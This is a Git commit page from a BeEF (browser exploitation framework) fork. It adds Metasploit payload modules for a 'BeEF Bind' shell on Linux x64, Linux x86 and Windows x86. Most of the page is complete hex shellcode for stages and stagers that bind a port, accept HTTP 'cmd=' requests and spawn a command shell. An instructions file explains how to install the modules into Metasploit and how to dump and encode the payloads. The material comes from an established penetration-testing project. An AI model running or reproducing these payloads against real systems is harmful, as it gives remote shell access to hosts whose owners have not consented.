Hiddenden/beef
2
0
Fork 0
Code Issues Pull Requests Actions Packages Projects Releases Wiki Activity

add IPE with ActiveFax 5.01

Browse Source
This commit is contained in:
bmantra
2013-11-29 19:18:37 +01:00
parent 924717d6fa
commit d7116b8f08
31 changed files with 118 additions and 4 deletions
Download Patch File Download Diff File Expand all files Collapse all files

73
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-handler.rb Normal file
View File

@@ -0,0 +1,73 @@
##
# $Id: beef_bind-handler.rb 121018 Ty Miller @ Threat Intelligence$
##
module Msf
module Handler
###
#
# This module implements the Bind TCP handler placeholder only.
#
###
module BeEFBind
include Msf::Handler
#
# Returns the handler specific string representation
#
def self.handler_type
return "beef_bind"
end
#
# Returns the connection oriented general handler type
#
def self.general_handler_type
"bind"
end
#
# Initializes a bind handler and adds the options common to all bind
# payloads, such as local port.
#
def initialize(info = {})
super
register_options(
[
Opt::LPORT(4444),
#OptAddress.new('RHOST', [false, 'The target address', '']),
], Msf::Handler::BeEFBind)
end
#
# Placeholder only
#
def cleanup_handler
end
#
# Placeholder only
#
def add_handler(opts={})
# Start a new handler
start_handler
end
#
# Placeholder only
#
def start_handler
end
#
# Placeholder only
#
def stop_handler
end
end
end
end

85
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x64.rb Normal file
View File

@@ -0,0 +1,85 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x64)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 165, 'n' ]
},
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x02\x41\x5e\x52\x48\x89\xe7\x6a\x16\x58\x0f" +
"\x05\x49\xff\xce\x4d\x85\xf6\x74\x02\xeb\xed\x6a\x39\x58\x0f\x05" +
"\x83\xf8\x00\x0f\x84\xdd\x01\x00\x00\x48\x31\xff\x8b\x7c\x24\x08" +
"\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x03\x58\x0f\x05\x8b\x3c" +
"\x24\x6a\x04\x5e\x48\x31\xd2\xba\x00\x08\x00\x00\x6a\x48\x58\x0f" +
"\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e\x6a\x07\x5a\x6a\x22\x41" +
"\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58\x0f\x05\x49\x89\xc6\x48" +
"\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48\x89\xc3" +
"\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01\x5e\x48" +
"\x89\xdf\x6a\x36\x58\x0f\x05\x58\x48\x31\xc0\x6a\x10\x5a\x50\x50" +
"\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31\x58" +
"\x0f\x05\x58\x58\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48" +
"\x31\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7" +
"\x48\x89\xdf\x6a\x03\x58\x0f\x05\xb9\x00\x10\x00\x00\x48\xff\xc9" +
"\x4c\x89\xf3\x48\x01\xcb\xc6\x03\x00\xe3\x02\xeb\xf0\x48\x31\xd2" +
"\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x04\x6a\x00\x58\x0f\x05\xb9" +
"\x00\x04\x00\x00\x4c\x89\xf3\x81\x3b\x63\x6d\x64\x3d\x74\x0a\x48" +
"\xff\xc3\x48\xff\xc9\xe3\x34\xeb\xee\x48\x31\xff\x48\x89\xd9\x48" +
"\x83\xc1\x03\x48\x89\xce\x8b\x7c\x24\x0c\x48\xff\xc6\x6a\x01\x5a" +
"\x6a\x01\x58\x0f\x05\x80\x3e\x0a\x75\xf0\x6a\x23\x58\x6a\x00\x6a" +
"\x01\x48\x89\xe7\x48\x31\xf6\x0f\x05\x58\x58\xe8\x62\x00\x00\x00" +
"\x48\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74" +
"\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73" +
"\x2d\x43\x6f\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f" +
"\x72\x69\x67\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e" +
"\x74\x2d\x4c\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a" +
"\x0d\x0a\x5e\x4c\x89\xf7\x48\x81\xc7\x00\x04\x00\x00\xb9\x62\x00" +
"\x00\x00\xf3\xa4\x48\x31\xff\x8b\x3c\x24\x4c\x89\xf6\x48\x81\xc6" +
"\x00\x04\x00\x00\x48\x83\xc6\x62\xba\x86\x0b\x00\x00\x48\x31\xc0" +
"\x0f\x05\x4c\x89\xff\x4c\x89\xf6\x48\x81\xc6\x00\x04\x00\x00\xba" +
"\xe8\x0b\x00\x00\x6a\x01\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f" +
"\x05\xe9\x69\xfe\xff\xff\x48\x31\xff\x8b\x7c\x24\x0c\x6a\x03\x58" +
"\x0f\x05\x48\x31\xff\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x08\x6a\x20" +
"\x58\x0f\x05\x8b\x3c\x24\x6a\x03\x58\x0f\x05\x48\x31\xff\x48\xff" +
"\xc7\x6a\x03\x58\x0f\x05\x8b\x7c\x24\x04\x6a\x20\x58\x0f\x05\x48" +
"\x31\xff\x48\x31\xf6\x48\x31\xd2\x6a\x75\x58\x0f\x05\x6a\x3b\x58" +
"\x48\xbf\x2f\x62\x69\x6e\x2f\x73\x68\x00\x57\x48\x89\xe7\x48\x31" +
"\xf6\x48\x31\xd2\x0f\x05"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

84
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-linux-x86.rb Normal file
View File

@@ -0,0 +1,84 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Linux
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Linux Command Shell Stage (stage x86)',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Bart Leppens' ],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShell,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 168, 'n' ]
},
'Payload' =>
"\xfc\x31\xd2\x6a\x02\x59\x52\x52\x89\xe3\x6a\x2a\x58\xcd\x80\x49" +
"\x67\xe3\x02\xeb\xf1\x31\xdb\x6a\x02\x58\xcd\x80\x3d\x00\x00\x00" +
"\x00\x0f\x84\xe4\x01\x00\x00\x8b\x5c\x24\x08\x6a\x06\x58\xcd\x80" +
"\x8b\x5c\x24\x04\x6a\x06\x58\xcd\x80\x8b\x1c\x24\x6a\x04\x59\x68" +
"\x00\x08\x00\x00\x5a\x6a\x37\x58\xcd\x80\x6a\x00\x68\xff\xff\xff" +
"\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x68\x00\x00\x00\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x81\xc4\x18\x00\x00\x00\x31\xd2" +
"\x31\xc0\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a\x66\x58\xcd" +
"\x80\x89\xc6\x81\xc4\x0c\x00\x00\x00\x6a\x0e\x5b\x6a\x04\x54\x6a" +
"\x02\x6a\x01\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00" +
"\x00\x6a\x02\x5b\x52\x68\x02\x00\x11\x5c\x89\xe1\x6a\x10\x51\x56" +
"\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x14\x00\x00\x00\x43\x43\x53" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x08\x00\x00\x00\x43\x52" +
"\x52\x56\x89\xe1\x6a\x66\x58\xcd\x80\x81\xc4\x0c\x00\x00\x00\x96" +
"\x93\xb8\x06\x00\x00\x00\xcd\x80\xb9\x00\x10\x00\x00\x49\x89\xfb" +
"\x01\xcb\xc6\x03\x00\xe3\x05\xe9\xf1\xff\xff\xff\x66\xba\x00\x04" +
"\x89\xf9\x89\xf3\x6a\x03\x58\xcd\x80\x57\x56\x89\xfb\xb9\x00\x04" +
"\x00\x00\x81\x3b\x63\x6d\x64\x3d\x74\x09\x43\x49\xe3\x3a\xe9\xef" +
"\xff\xff\xff\x89\xd9\x81\xc1\x03\x00\x00\x00\x8b\x5c\x24\x14\x41" +
"\x6a\x01\x5a\x6a\x04\x58\xcd\x80\x80\x39\x0a\x75\xf2\x68\x00\x00" +
"\x00\x00\x68\x01\x00\x00\x00\x89\xe3\x31\xc9\xb8\xa2\x00\x00\x00" +
"\xcd\x80\x81\xc4\x08\x00\x00\x00\xe8\x62\x00\x00\x00\x48\x54\x54" +
"\x50\x2f\x31\x2e\x31\x20\x32\x30\x30\x20\x4f\x4b\x0d\x0a\x43\x6f" +
"\x6e\x74\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20\x74\x65\x78\x74" +
"\x2f\x68\x74\x6d\x6c\x0d\x0a\x41\x63\x63\x65\x73\x73\x2d\x43\x6f" +
"\x6e\x74\x72\x6f\x6c\x2d\x41\x6c\x6c\x6f\x77\x2d\x4f\x72\x69\x67" +
"\x69\x6e\x3a\x20\x2a\x0d\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34\x38\x0d\x0a\x0d\x0a\x5e" +
"\x81\xc7\x00\x04\x00\x00\xb9\x62\x00\x00\x00\xf3\xa4\x5f\x5e\x8b" +
"\x1c\x24\x89\xf1\x81\xc1\x00\x04\x00\x00\x81\xc1\x62\x00\x00\x00" +
"\x68\x86\x0b\x00\x00\x5a\x6a\x03\x58\xcd\x80\x89\xfb\x89\xf1\x81" +
"\xc1\x00\x04\x00\x00\xba\xe8\x0b\x00\x00\x6a\x04\x58\xcd\x80\x6a" +
"\x06\x58\xcd\x80\x89\xf7\xe9\x63\xfe\xff\xff\x8b\x5c\x24\x0c\x6a" +
"\x06\x58\xcd\x80\x31\xdb\x6a\x06\x58\xcd\x80\x8b\x5c\x24\x08\x6a" +
"\x29\x58\xcd\x80\x8b\x1c\x24\x6a\x06\x58\xcd\x80\x31\xdb\x43\x6a" +
"\x06\x58\xcd\x80\x8b\x5c\x24\x04\x6a\x29\x58\xcd\x80\x31\xc0\x31" +
"\xdb\x31\xc9\x31\xd2\xb0\xa4\xcd\x80\x31\xc0\x50\x50\x68\x2f\x2f" +
"\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x6a\x0b\x58\xcd\x80"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

137
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stage-windows-x86.rb Normal file
View File

@@ -0,0 +1,137 @@
##
# $Id: beef_bind-stage.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/base/sessions/command_shell'
require 'msf/base/sessions/command_shell_options'
module Metasploit3
include Msf::Payload::Windows
include Msf::Sessions::CommandShellOptions
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind Windows Command Shell Stage (stager)',
'Version' => '$Revision: 11421 $',
'Description' => 'Spawn a piped command shell (staged) with an HTTP interface',
'Author' => [ 'Ty Miller' ],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Session' => Msf::Sessions::CommandShellWindows,
'PayloadCompat' =>
{
'Convention' => 'beef_bind'
},
'Stage' =>
{
'Offsets' =>
{
'LPORT' => [ 511, 'n' ]
},
'Payload' =>
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31" +
"\xd2\x64\x8b\x52\x30\x8b\x52\x0c\x8b\x52" +
"\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff" +
"\x31\xc0\xac\x3c\x61\x7c\x02\x2c\x20\xc1" +
"\xcf\x0d\x01\xc7\xe2\xf0\x52\x57\x8b\x52" +
"\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85" +
"\xc0\x74\x4a\x01\xd0\x50\x8b\x48\x18\x8b" +
"\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d" +
"\x01\xc7\x38\xe0\x75\xf4\x03\x7d\xf8\x3b" +
"\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3" +
"\x66\x8b\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b" +
"\x04\x8b\x01\xd0\x89\x44\x24\x24\x5b\x5b" +
"\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b" +
"\x12\xeb\x86\x5d\xbb\x00\x10\x00\x00\x6a" +
"\x40\x53\x53\x6a\x00\x68\x58\xa4\x53\xe5" +
"\xff\xd5\x89\xc6\x68\x01\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x68\x0c\x00\x00\x00\x68" +
"\x00\x00\x00\x00\x89\xe3\x68\x00\x00\x00" +
"\x00\x89\xe1\x68\x00\x00\x00\x00\x8d\x7c" +
"\x24\x0c\x57\x53\x51\x68\x3e\xcf\xaf\x0e" +
"\xff\xd5\x68\x00\x00\x00\x00\x89\xe3\x68" +
"\x00\x00\x00\x00\x89\xe1\x68\x00\x00\x00" +
"\x00\x8d\x7c\x24\x14\x57\x53\x51\x68\x3e" +
"\xcf\xaf\x0e\xff\xd5\x8b\x5c\x24\x08\x68" +
"\x00\x00\x00\x00\x68\x01\x00\x00\x00\x53" +
"\x68\xca\x13\xd3\x1c\xff\xd5\x8b\x5c\x24" +
"\x04\x68\x00\x00\x00\x00\x68\x01\x00\x00" +
"\x00\x53\x68\xca\x13\xd3\x1c\xff\xd5\x89" +
"\xf7\x68\x63\x6d\x64\x00\x89\xe3\xff\x74" +
"\x24\x10\xff\x74\x24\x14\xff\x74\x24\x0c" +
"\x31\xf6\x6a\x12\x59\x56\xe2\xfd\x66\xc7" +
"\x44\x24\x3c\x01\x01\x8d\x44\x24\x10\xc6" +
"\x00\x44\x54\x50\x56\x56\x56\x46\x56\x4e" +
"\x56\x56\x53\x56\x68\x79\xcc\x3f\x86\xff" +
"\xd5\x89\xfe\xb9\xf8\x0f\x00\x00\x8d\x46" +
"\x08\xc6\x00\x00\x40\xe2\xfa\x56\x8d\xbe" +
"\x18\x04\x00\x00\xe8\x42\x00\x00\x00\x48" +
"\x54\x54\x50\x2f\x31\x2e\x31\x20\x32\x30" +
"\x30\x20\x4f\x4b\x0d\x0a\x43\x6f\x6e\x74" +
"\x65\x6e\x74\x2d\x54\x79\x70\x65\x3a\x20" +
"\x74\x65\x78\x74\x2f\x68\x74\x6d\x6c\x0d" +
"\x0a\x43\x6f\x6e\x74\x65\x6e\x74\x2d\x4c" +
"\x65\x6e\x67\x74\x68\x3a\x20\x33\x30\x34" +
"\x38\x0d\x0a\x0d\x0a\x5e\xb9\x42\x00\x00" +
"\x00\xf3\xa4\x5e\x56\x68\x33\x32\x00\x00" +
"\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26" +
"\x07\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4" +
"\x54\x50\x68\x29\x80\x6b\x00\xff\xd5\x50" +
"\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f" +
"\xdf\xe0\xff\xd5\x97\x31\xdb\x53\x68\x02" +
"\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57\x68" +
"\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7" +
"\xe9\x38\xff\xff\xd5\x53\x53\x57\x68\x74" +
"\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e" +
"\x4d\x61\xff\xd5\x81\xc4\xa0\x01\x00\x00" +
"\x5e\x89\x3e\x6a\x00\x68\x00\x04\x00\x00" +
"\x89\xf3\x81\xc3\x08\x00\x00\x00\x53\xff" +
"\x36\x68\x02\xd9\xc8\x5f\xff\xd5\x8b\x54" +
"\x24\x64\xb9\x00\x04\x00\x00\x81\x3b\x63" +
"\x6d\x64\x3d\x74\x06\x43\x49\xe3\x3a\xeb" +
"\xf2\x81\xc3\x03\x00\x00\x00\x43\x53\x68" +
"\x00\x00\x00\x00\x8d\xbe\x10\x04\x00\x00" +
"\x57\x68\x01\x00\x00\x00\x53\x8b\x5c\x24" +
"\x70\x53\x68\x2d\x57\xae\x5b\xff\xd5\x5b" +
"\x80\x3b\x0a\x75\xda\x68\xe8\x03\x00\x00" +
"\x68\x44\xf0\x35\xe0\xff\xd5\x31\xc0\x50" +
"\x8d\x5e\x04\x53\x50\x50\x50\x8d\x5c\x24" +
"\x74\x8b\x1b\x53\x68\x18\xb7\x3c\xb3\xff" +
"\xd5\x85\xc0\x74\x44\x8b\x46\x04\x85\xc0" +
"\x74\x3d\x68\x00\x00\x00\x00\x8d\xbe\x14" +
"\x04\x00\x00\x57\x68\xa6\x0b\x00\x00\x8d" +
"\xbe\x5a\x04\x00\x00\x57\x8d\x5c\x24\x70" +
"\x8b\x1b\x53\x68\xad\x9e\x5f\xbb\xff\xd5" +
"\x6a\x00\x68\xe8\x0b\x00\x00\x8d\xbe\x18" +
"\x04\x00\x00\x57\xff\x36\x68\xc2\xeb\x38" +
"\x5f\xff\xd5\xff\x36\x68\xc6\x96\x87\x52" +
"\xff\xd5\xe9\x58\xfe\xff\xff"
}
))
end
# Stage encoding is safe for this payload
def encode_stage?
true
end
end

49
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x64.rb Normal file
View File

@@ -0,0 +1,49 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X64,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 54, 'n' ] },
'Payload' =>
"\xfc\x48\x31\xd2\x6a\x01\x5e\x6a\x02\x5f\x6a\x29\x58\x0f\x05\x48" +
"\x89\xc3\x6a\x01\x49\x89\xe2\x6a\x08\x41\x58\x6a\x02\x5a\x6a\x01" +
"\x5e\x48\x89\xdf\x6a\x36\x58\x0f\x05\x48\x31\xc0\x6a\x10\x5a\x50" +
"\x50\xc7\x04\x24\x02\x00\x11\x5c\x48\x89\xe6\x48\x89\xdf\x6a\x31" +
"\x58\x0f\x05\x48\x31\xf6\x48\x89\xdf\x6a\x32\x58\x0f\x05\x48\x31" +
"\xd2\x48\x31\xf6\x48\x89\xdf\x6a\x2b\x58\x0f\x05\x49\x89\xc7\x48" +
"\x89\xdf\x6a\x03\x58\x0f\x05\x48\x31\xff\x68\x00\x10\x00\x00\x5e" +
"\x6a\x07\x5a\x6a\x22\x41\x5a\x57\x57\x41\x59\x41\x58\x6a\x09\x58" +
"\x0f\x05\x49\x89\xc6\x4c\x89\xff\x4c\x89\xf6\x66\xba\x00\x10\x6a" +
"\x00\x58\x0f\x05\x4c\x89\xff\x6a\x03\x58\x0f\x05\x4c\x89\xf6\x81" +
"\x3e\x63\x6d\x64\x3d\x74\x05\x48\xff\xc6\xeb\xf3\x6a\x04\x58\x48" +
"\x01\xc6\xff\xe6"
}
))
end
end

47
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-linux-x86.rb Normal file
View File

@@ -0,0 +1,47 @@
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Linux
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Bart Leppens'],
'License' => BSD_LICENSE,
'Platform' => 'linux',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 47, 'n' ] },
'Payload' =>
"\xfc\x31\xc0\x31\xd2\x6a\x01\x5b\x50\x40\x50\x40\x50\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x89\xc6\x6a\x0e\x5b\x6a\x04\x54\x6a\x02\x6a\x01" +
"\x56\x89\xe1\x6a\x66\x58\xcd\x80\x6a\x02\x5b\x52\x68\x02\x00\x11" +
"\x5c\x89\xe1\x6a\x10\x51\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x43" +
"\x53\x56\x89\xe1\x6a\x66\x58\xcd\x80\x43\x52\x52\x56\x89\xe1\x6a" +
"\x66\x58\xcd\x80\x96\x93\xb8\x06\x00\x00\x00\xcd\x80\x6a\x00\x68" +
"\xff\xff\xff\xff\x6a\x22\x6a\x07\x68\x00\x10\x00\x00\x6a\x00\x89" +
"\xe3\x6a\x5a\x58\xcd\x80\x89\xc7\x66\xba\x00\x10\x89\xf9\x89\xf3" +
"\x6a\x03\x58\xcd\x80\x6a\x06\x58\xcd\x80\x81\x3f\x63\x6d\x64\x3d" +
"\x74\x03\x47\xeb\xf5\x6a\x04\x58\x01\xc7\xff\xe7"
}
))
end
end

62
modules/exploits/beefbind/shellcode_sources/msf/beef_bind-stager-windows-x86.rb Normal file
View File

@@ -0,0 +1,62 @@
##
# $Id: beef_bind-stager.rb 121018 Ty Miller @ Threat Intelligence$
##
##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##
require 'msf/core'
require 'msf/core/handler/beef_bind'
module Metasploit3
include Msf::Payload::Stager
include Msf::Payload::Windows
def initialize(info = {})
super(merge_info(info,
'Name' => 'BeEF Bind HTTP Stager',
'Version' => '$Revision: 9179 $',
'Description' => 'Proxy web requests between a web browser and a shell',
'Author' => ['Ty Miller'],
'License' => BSD_LICENSE,
'Platform' => 'win',
'Arch' => ARCH_X86,
'Handler' => Msf::Handler::BeEFBind,
'Convention' => 'beef_bind',
'Stager' =>
{
'RequiresMidstager' => false,
'Offsets' => { 'LPORT' => [ 200, 'n' ] },
'Payload' =>
# Length: 299 bytes
"\xfc\xe8\x89\x00\x00\x00\x60\x89\xe5\x31\xd2\x64\x8b\x52\x30\x8b" +
"\x52\x0c\x8b\x52\x14\x8b\x72\x28\x0f\xb7\x4a\x26\x31\xff\x31\xc0" +
"\xac\x3c\x61\x7c\x02\x2c\x20\xc1\xcf\x0d\x01\xc7\xe2\xf0\x52\x57" +
"\x8b\x52\x10\x8b\x42\x3c\x01\xd0\x8b\x40\x78\x85\xc0\x74\x4a\x01" +
"\xd0\x50\x8b\x48\x18\x8b\x58\x20\x01\xd3\xe3\x3c\x49\x8b\x34\x8b" +
"\x01\xd6\x31\xff\x31\xc0\xac\xc1\xcf\x0d\x01\xc7\x38\xe0\x75\xf4" +
"\x03\x7d\xf8\x3b\x7d\x24\x75\xe2\x58\x8b\x58\x24\x01\xd3\x66\x8b" +
"\x0c\x4b\x8b\x58\x1c\x01\xd3\x8b\x04\x8b\x01\xd0\x89\x44\x24\x24" +
"\x5b\x5b\x61\x59\x5a\x51\xff\xe0\x58\x5f\x5a\x8b\x12\xeb\x86\x5d" +
"\x68\x33\x32\x00\x00\x68\x77\x73\x32\x5f\x54\x68\x4c\x77\x26\x07" +
"\xff\xd5\xb8\x90\x01\x00\x00\x29\xc4\x54\x50\x68\x29\x80\x6b\x00" +
"\xff\xd5\x50\x50\x50\x50\x40\x50\x40\x50\x68\xea\x0f\xdf\xe0\xff" +
"\xd5\x97\x31\xdb\x53\x68\x02\x00\x11\x5c\x89\xe6\x6a\x10\x56\x57" +
"\x68\xc2\xdb\x37\x67\xff\xd5\x53\x57\x68\xb7\xe9\x38\xff\xff\xd5" +
"\x53\x53\x57\x68\x74\xec\x3b\xe1\xff\xd5\x57\x97\x68\x75\x6e\x4d" +
"\x61\xff\xd5\xbb\x00\x10\x00\x00\x6a\x40\x53\x53\x6a\x00\x68\x58" +
"\xa4\x53\xe5\xff\xd5\x89\xc6\x6a\x00\x53\x50\x57\x68\x02\xd9\xc8" +
"\x5f\xff\xd5\x57\x68\xc6\x96\x87\x52\xff\xd5\x81\x3e\x63\x6d\x64" +
"\x3d\x74\x03\x46\xeb\xf5\x83\xc6\x04\xff\xe6"
}
))
end
end

37
modules/exploits/beefbind/shellcode_sources/msf/instructions.txt Normal file
View File

@@ -0,0 +1,37 @@
Install into Metasploit on BackTrack:
cp beef_bind-handler.rb /pentest/exploits/framework3/lib/msf/core/handler/beef_bind.rb
cp beef_bind-stage-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stages/windows/beef_shell.rb
cp beef_bind-stager-windows-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/windows/beef_bind.rb
cp beef_bind-stage-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x86/beef_shell.rb
cp beef_bind-stager-linux-x86.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x86/beef_bind.rb
cp beef_bind-stage-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stages/linux/x64/beef_shell.rb
cp beef_bind-stager-linux-x64.rb /pentest/exploits/framework3/modules/payloads/stagers/linux/x64/beef_bind.rb
Check it works:
msfpayload -l | grep beef_bind
Get info on the payload:
msfpayload windows/beef_shell/beef_bind S
Dump stager and stage in C format:
msfpayload windows/beef_shell/beef_bind C
Dump stager in raw format:
msfpayload windows/beef_shell/beef_bind R > beef_bind-stager
Encode stager to remove nulls:
msfpayload windows/beef_shell/beef_bind R | msfencode -b '\x00'